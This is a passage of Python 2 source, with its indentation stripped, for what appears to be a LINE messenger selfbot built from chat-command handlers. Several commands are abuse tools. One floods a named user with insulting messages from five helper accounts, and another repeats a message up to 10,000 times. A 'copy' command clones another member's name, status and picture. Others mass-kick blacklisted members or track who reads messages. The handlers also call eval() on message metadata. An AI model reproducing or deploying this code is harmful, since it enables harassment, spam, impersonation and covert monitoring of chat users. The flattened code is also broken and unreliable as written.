if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
acil.sendText(msg.to,"BOT API SIMISIMI TURN ON")
ki.sendText(msg.to,"already turn active")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
acil.sendText(msg.to,"BOT API SIMISIMI TURN OFF")
ki.sendText(msg.to,"already non active")
elif msg.text in ["Read on","Read:on"]:
if wait['alwayRead'] == True:
if wait["alwayRead"] == "JP":
acil.sendText(msg.to,"Auto Sider ON")
else:
wait["alwayRead"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Read off","Read:off"]:
if wait['alwayRead'] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Sider OFF")
else:
wait['alwayRead'] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF auto read")
elif msg.text in ["Deletechat"]:
if wait['Removechat'] == True:
if wait["Removechat"] == "JP":
acil.sendText(msg.to,"Success!!!")
if wait['Removechat'] == False:
if wait["lang"] == "JP":
pass
elif "Sider:on" in msg.text:
# if msg.toType == 2:
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
elif "Sider:off" in msg.text:
# if msg.toType == 2:
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
else:
acil.sendText(msg.to, "Heh Belom Di Set")
elif msg.text in ["Autorespon on","Autorespon:on","Respon on","Respon:on"]:
if wait["detectMention"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Respon ON")
else:
wait["detectMention"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Autorespon off","Autorespon:off","Respon off","Respon:off"]:
if wait["detectMention"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Respon OFF")
else:
wait["detectMention"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text in ["Notag:on"]:
if wait["kickMention"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"☠️DANGER TAG KICK ON☠️")
else:
wait["kickMention"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"already ON")
elif msg.text in ["Notag:off"]:
if wait["kickMention"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"SELF PROTECT TAG OFF ✔")
else:
wait["kickMention"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"already turn OF")
elif msg.text.lower() == 'clock:on':
if wait["clock"] == True:
acil.sendText(msg.to,"Already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
acil.sendText(msg.to,"Clock on✔")
elif msg.text in ["Stickertag:on"]:
if wait["stickerMention"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah on")
else:
wait["stickerMention"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Stickertag:off"]:
if wait["stickerMention"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah off")
else:
wait["stickerMention"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text.lower() == 'clock:off':
if wait["clock"] == False:
acil.sendText(msg.to,"It is already off✖")
else:
wait["clock"] = False
acil.sendText(msg.to,"Turned off ✔")
elif "Clockname " in msg.text:
n = msg.text.replace("Jam say ","")
if len(n.decode("utf-8")) > 30:
acil.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
acil.sendText(msg.to,"Ini telah diubah✔\n\n" + n)
elif msg.text in ["Translate"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,translateMessage)
else:
acil.sendText(msg.to,helpt)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
acil.sendText(msg.to,"Diperbarui✔")
else:
acil.sendText(msg.to,"✨Silahkan Aktifkan Nama✨")
elif ("Fuck " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
acil.kickoutFromGroup(msg.to,[target])
except:
acil.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Kick2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("Kick3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
except:
ki3.sendText(msg.to,"Error")
elif ("Kick4 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
except:
ki4.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("Sc " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
key = acil.getContact(key1)
acil.sendText(msg.to,"" + key1)
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Succes Banned")
except:
pass
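# Admin membership is persisted to st2__a.json (the blacklist uses st2__b.json) so both survive restarts.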
elif "Admin:add " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["ACIL"][target] = True
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"ADMIN DI TAMBAHKAN")
print "[Admin]DITAMBAHKAN"
except:
pass
elif "Admin:del @" in msg.text:
if msg.toType == 2:
print "[Admin]DIHAPUS"
_name = msg.text.replace("Admin:del @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["ACIL"][target]
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif msg.text in ["Listadmin","Adminlist"]:
if wait["ACIL"] == {}:
acil.sendText(msg.to,"No user is ADMIN")
else:
mc = " 🛡️==||ADMIN||==🛡️\n"
for mi_d in wait["ACIL"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif msg.text in ["Mygroups"]:
gid = acil.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⛓️] %s \n" % (acil.getGroup(i).name + " | 🗜️Members : " + str(len (acil.getGroup(i).members)))
acil.sendText(msg.to, "☆「Group List」☆\n"+ h +"🗜️Total Group : " +str(len(gid)))
#----------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = acil.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Locked")
except:
acil.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = acil.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif "Id " in msg.text:
msgg = msg.text.replace("Id ",'')
conn = acil.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
acil.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
acil.sendMessage(msg)
#_________________________________________________________________________
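# "ig <username>" scrapes the public Instagram profile page and reads its og: meta tags for basic stats.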
elif 'ig ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
acil.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
acil.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
acil.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
acil.sendImageWithURL(msg.to,path)
except:
pass
elif msg.text in ["Kalender","Time","Waktu"]:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
bln = bulan[int(bln) - 1]
rst = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nTime : [ " + timeNow.strftime('%H:%M:%S') + " ]"
acil.sendText(msg.to, rst)
#=======================================================================
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
acil.sendText(msg.to,van)
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif msg.text in ["Myname"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = acil.getContact(mid)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = acil.getContact(mid)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = acil.getContact(mid)
cu = acil.channel.getCover(mid)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = acil.getContact(mid)
cu = acil.channel.getCover(mid)
path = str(cu)
acil.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
acil.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
acil.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
acil.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
acil.sendVideoWithURL(msg.to,wait["pap"])
#=========================
#-----------------------------------------------------------
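# "Check" records a read point for this chat; wait2 then accumulates whoever reads past it.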
elif msg.text == "Check":
acil.sendText(msg.to, "Check Yang nyimak")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif 'copy ' in msg.text.lower():
if msg.toType == 2:
red = re.compile(re.escape('copy '),re.IGNORECASE)
tname = red.sub('',msg.text)
tname = tname.lstrip()
tname = tname.replace(" @","$spliter$")
tname = tname.rstrip()
tname = tname.split("$spliter$")
tname = tname[0]
tname = tname[1:]
clist = {
"Founded":False,
"displayName":"",
"statusMessage":"",
"pictureStatus":""
}
mems = acil.getGroup(msg.to).members
for targ in mems:
if targ.displayName == tname:
clist["displayName"] = targ.displayName
clist["statusMessage"] = targ.statusMessage
clist["pictureStatus"] = targ.pictureStatus
clist["Founded"] = True
if clist["Founded"]:
wait["selfStatus"] = False
me = acil.getProfile()
me.displayName = clist["displayName"]
me.statusMessage = clist["statusMessage"]
me.pictureStatus = clist["pictureStatus"]
acil.updateDisplayPicture(me.pictureStatus)
acil.updateProfile(me)
acil.sendText(msg.to,"Done")
else:
acil.sendText(msg.to,"Done")
elif "Urlpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Urlpict @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Urlcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Urlcover @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
acil.sendText(msg.to,"Tidak Ada kontak blacklist")
else:
acil.sendText(msg.to,"═════════List Blacklist════════")
h = ""
for i in wait["blacklist"]:
h = acil.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
acil.sendMessage(M)
#-------------------------------------------------
elif "Spam @" in msg.text:
# if msg.from_ in admin:
_name = msg.text.replace("Spam @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to,"Wating in progres...")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
acil.sendText(msg.to, "Succes...!!!!")
print " Spammed !"
#--------------------------------------------------------------------------
#-----------------------------------------------------------
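# "Mban:<mid>" blacklists a raw mid directly, with no mention or contact message needed.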
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
acil.sendText(msg.to,"Target Lock")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
ki.sendText(msg.to, text)
else:
acil.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 10000:
ki.sendText(msg.to, tulisan)
else:
acil.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
acil.sendText(msg.to,"Target ditambahkan!")
break
except:
acil.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
acil.sendText(msg.to,"Target dihapuskan!")
break
except:
acil.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
acil.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
acil.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
acil.sendText(msg.to,"Mimic change to target")
else:
acil.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
acil.sendText(msg.to,"Reply Message on")
else:
acil.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
acil.sendText(msg.to,"Reply Message off")
else:
acil.sendText(msg.to,"Sudah off")
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = acil.getGroup(msg.to)
acil.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = acil.getGroup(msg.to)
acil.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["Friendlist"]:
contactlist = acil.getAllContactIds()
kontak = acil.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = acil.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
acil.sendText(msg.to, msgs)
elif msg.text in ["Friendlistmid"]:
gruplist = acil.getAllContactIds()
kontak = acil.getContacts(gruplist)
num=1
msgs="═════════List FriendMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════List FriendMid═════════\n\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
#-----------------------------------------------
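# Lurk commands persist the read point to sider.json; "lurkers" then builds an @-mention
# message out of everyone recorded in wait2["ROM"] since the point was set.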
elif "lurk:on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
acil.sendText(msg.to,"Lurking already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
acil.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk:off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
acil.sendText(msg.to,"Lurking already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
acil.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
acil.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = acil.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
acil.sendMessage(msg)
except Exception as error:
print error
pass
else:
acil.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["Bl:on"]:
wait["wblacklist"] = True
acil.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbl:on"]:
wait["dblacklist"] = True
acil.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
acil.sendText(msg.to," Nothing in the blacklist")
else:
acil.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
acil.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = " 🛡️====||B L A C K L I S T||====🛡️\n"
for mi_d in wait["blacklist"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
print "[Command]Banlist executed"
elif msg.text in ["Clearban"]:
if msg.toType == 2:
wait["blacklist"] = {}
acil.sendText(msg.to,"clear all blacklist")
ki.sendText(msg.to,"done ✔")
ki2.sendText(msg.to,"done ✔")
ki3.sendText(msg.to,"done ✔")
ki4.sendText(msg.to,"done ✔")
ki5.sendText(msg.to,"done ✔")
ki.sendText(msg.to,"blacklist done all removed 👮")
elif msg.text.lower() == 'kick@mbl':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
acil.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#-----------------------------------------------
#---------------------------------------------------
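# "Pict @name" fetches the mentioned member's avatar from the LINE CDN and sends it as an image.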
elif "Pict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Pict @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#---------------------------------------------------
#---------------------------------------------------
elif msg.text in ["Recopy"]:
try:
acil.updateDisplayPicture(mybackup.pictureStatus)
acil.updateProfile(mybackup)
acil.sendText(msg.to, "Success")
except Exception as e:
acil.sendText(msg.to, str (e))
#-----------------------------------------------------------------------
elif "Youtube " in msg.text:
try:
textToSearch = (msg.text).replace("Youtube ", "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
acil.sendText(msg.to,'https://www.youtube.com' + results['href'])
